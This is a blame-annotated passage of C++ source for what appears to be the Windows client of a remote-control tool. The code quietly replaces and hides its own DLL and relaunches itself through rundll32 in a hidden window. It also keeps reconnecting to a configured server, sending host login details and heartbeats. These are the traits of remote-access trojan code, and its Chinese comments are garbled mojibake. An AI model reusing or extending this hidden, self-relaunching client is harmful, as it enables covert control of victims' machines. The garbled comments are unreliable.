2024-12-29 20:47:14 +08:00
|
|
|
|
ok = FALSE;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
if (ok && !MoveFileA(path, oldFile.c_str())) {
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("Error removing file. Error code: %d\n", GetLastError());
|
2024-12-29 20:47:14 +08:00
|
|
|
|
if (_access(path, 0) != -1)
|
|
|
|
|
|
{
|
|
|
|
|
|
ok = FALSE;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
else {
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA><EFBFBD><EFBFBD>
|
|
|
|
|
|
if (SetFileAttributesA(oldFile.c_str(), FILE_ATTRIBUTE_HIDDEN))
|
|
|
|
|
|
{
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("File created and set to hidden: %s\n", oldFile.c_str());
|
2024-12-29 20:47:14 +08:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
if (ok && !MoveFileA(newFile.c_str(), path)) {
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("Error removing file. Error code: %d\n", GetLastError());
|
2024-12-29 20:47:14 +08:00
|
|
|
|
MoveFileA(oldFile.c_str(), path);// recover
|
|
|
|
|
|
}
|
|
|
|
|
|
else if (ok) {
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("Using new file: %s\n", newFile.c_str());
|
2024-12-29 20:47:14 +08:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
char cmd[1024];
|
|
|
|
|
|
sprintf_s(cmd, "%s,Run %s", path, cmdLine);
|
|
|
|
|
|
ShellExecuteA(NULL, "open", "rundll32.exe", cmd, NULL, SW_HIDE);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
/* <20><><EFBFBD>пͻ<D0BF><CDBB>˵ĺ<CBB5><C4BA>Ĵ<EFBFBD><C4B4><EFBFBD>. <20><>Ϊ<EFBFBD><CEAA><EFBFBD>嵼<EFBFBD><E5B5BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> rundll32 <20><><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC>.
|
|
|
|
|
|
HWND hwnd: <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͨ<EFBFBD><EFBFBD>Ϊ NULL<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
HINSTANCE hinst: DLL <EFBFBD><EFBFBD>ʵ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
LPSTR lpszCmdLine: <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>в<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD>ַ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݸ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
int nCmdShow: <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ״̬<EFBFBD><EFBFBD>
|
|
|
|
|
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>rundll32.exe ClientDemo.dll,Run 127.0.0.1:6543
|
|
|
|
|
|
<EFBFBD><EFBFBD><EFBFBD>ȴ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>в<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD>ȡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD>ȫ<EFBFBD>ֱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡ<EFBFBD><EFBFBD>
|
|
|
|
|
|
*/
|
|
|
|
|
|
extern "C" __declspec(dllexport) void Run(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
|
2025-04-07 18:18:36 +08:00
|
|
|
|
ClientApp& app(g_MyApp);
|
|
|
|
|
|
CONNECT_ADDRESS& settings(*(app.g_Connection));
|
|
|
|
|
|
BOOL& bExit(app.g_bExit);
|
2024-12-29 20:47:14 +08:00
|
|
|
|
char message[256] = { 0 };
|
|
|
|
|
|
if (strlen(lpszCmdLine) != 0) {
|
|
|
|
|
|
strcpy_s(message, lpszCmdLine);
|
2025-04-07 18:18:36 +08:00
|
|
|
|
}else if (settings.IsValid())
|
2024-12-29 20:47:14 +08:00
|
|
|
|
{
|
2025-04-07 18:18:36 +08:00
|
|
|
|
sprintf_s(message, "%s:%d", settings.ServerIP(), settings.ServerPort());
|
2024-12-29 20:47:14 +08:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
std::istringstream stream(message);
|
|
|
|
|
|
std::string item;
|
|
|
|
|
|
std::vector<std::string> result;
|
|
|
|
|
|
while (std::getline(stream, item, ':')) {
|
|
|
|
|
|
result.push_back(item);
|
|
|
|
|
|
}
|
|
|
|
|
|
if (result.size() == 1)
|
|
|
|
|
|
{
|
|
|
|
|
|
result.push_back("80");
|
|
|
|
|
|
}
|
|
|
|
|
|
if (result.size() != 2) {
|
|
|
|
|
|
MessageBox(hwnd, "<EFBFBD><EFBFBD><EFBFBD>ṩ<EFBFBD><EFBFBD>ȷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ַ!", "<EFBFBD><EFBFBD>ʾ", MB_OK);
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2025-02-07 18:59:15 +08:00
|
|
|
|
do {
|
2024-12-29 20:47:14 +08:00
|
|
|
|
TestRun((char*)result[0].c_str(), atoi(result[1].c_str()));
|
|
|
|
|
|
while (!IsStoped())
|
|
|
|
|
|
Sleep(20);
|
2025-04-07 18:18:36 +08:00
|
|
|
|
if (bExit == 1)
|
2025-02-07 18:59:15 +08:00
|
|
|
|
return;
|
2025-04-07 18:18:36 +08:00
|
|
|
|
else if (bExit == 2)
|
2025-02-07 18:59:15 +08:00
|
|
|
|
continue;
|
|
|
|
|
|
else // 3
|
|
|
|
|
|
break;
|
|
|
|
|
|
} while (true);
|
|
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
sprintf_s(message, "%s:%d", settings.ServerIP(), settings.ServerPort());
|
2024-12-29 20:47:14 +08:00
|
|
|
|
RunNewDll(message);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2019-01-06 21:18:26 +08:00
|
|
|
|
#endif
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
|
|
|
|
|
DWORD WINAPI StartClient(LPVOID lParam)
|
|
|
|
|
|
{
|
2025-04-07 18:18:36 +08:00
|
|
|
|
ClientApp& app(*(ClientApp*)lParam);
|
|
|
|
|
|
CONNECT_ADDRESS& settings(*(app.g_Connection));
|
|
|
|
|
|
BOOL& bExit(app.g_bExit);
|
|
|
|
|
|
IOCPClient *ClientObject = new IOCPClient(bExit);
|
|
|
|
|
|
|
|
|
|
|
|
if (NULL == app.g_hEvent)
|
|
|
|
|
|
app.g_hEvent = CreateEventA(NULL, TRUE, FALSE, EVENT_FINISHED);
|
|
|
|
|
|
if (app.g_hEvent == NULL) {
|
|
|
|
|
|
Mprintf("[StartClient] Failed to create event: %s! %d.\n", EVENT_FINISHED, GetLastError());
|
|
|
|
|
|
}
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
app.g_bThreadExit = false;
|
|
|
|
|
|
while (!bExit)
|
2019-01-05 20:21:43 +08:00
|
|
|
|
{
|
2025-02-06 04:15:34 +08:00
|
|
|
|
ULONGLONG dwTickCount = GetTickCount64();
|
2025-04-07 18:18:36 +08:00
|
|
|
|
if (!ClientObject->ConnectServer(settings.ServerIP(), settings.ServerPort()))
|
2019-01-05 20:21:43 +08:00
|
|
|
|
{
|
2025-04-07 18:18:36 +08:00
|
|
|
|
for (int k = 500; !bExit && --k; Sleep(10));
|
2019-01-05 20:21:43 +08:00
|
|
|
|
continue;
|
|
|
|
|
|
}
|
|
|
|
|
|
//<><D7BC><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
2025-04-07 18:18:36 +08:00
|
|
|
|
LOGIN_INFOR login = GetLoginInfo(GetTickCount64() - dwTickCount, settings.ClientType());
|
|
|
|
|
|
ClientObject->SendLoginInfo(login);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
CKernelManager *Manager = new CKernelManager(&settings, ClientObject, app.g_hInstance);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
do
|
|
|
|
|
|
{
|
2025-04-07 18:18:36 +08:00
|
|
|
|
Manager->SendHeartbeat();
|
|
|
|
|
|
} while (ClientObject->IsRunning() && ClientObject->IsConnected() && !bExit);
|
|
|
|
|
|
while (GetTickCount64() - dwTickCount < 5000 && !bExit)
|
2019-01-05 20:21:43 +08:00
|
|
|
|
Sleep(200);
|
|
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
delete Manager;
|
|
|
|
|
|
}
|
|
|
|
|
|
if (app.g_bExit == 1 && app.g_hEvent) {
|
|
|
|
|
|
BOOL b = SetEvent(app.g_hEvent);
|
|
|
|
|
|
Mprintf(">>> [StartClient] Set event: %s %s!\n", EVENT_FINISHED, b ? "succeed" : "failed");
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
CloseHandle(app.g_hEvent);
|
|
|
|
|
|
app.g_hEvent = NULL;
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
|
|
|
|
|
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("StartClient end\n");
|
2019-01-05 20:21:43 +08:00
|
|
|
|
delete ClientObject;
|
2025-04-07 18:18:36 +08:00
|
|
|
|
app.g_bThreadExit = true;
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
|
|
}
|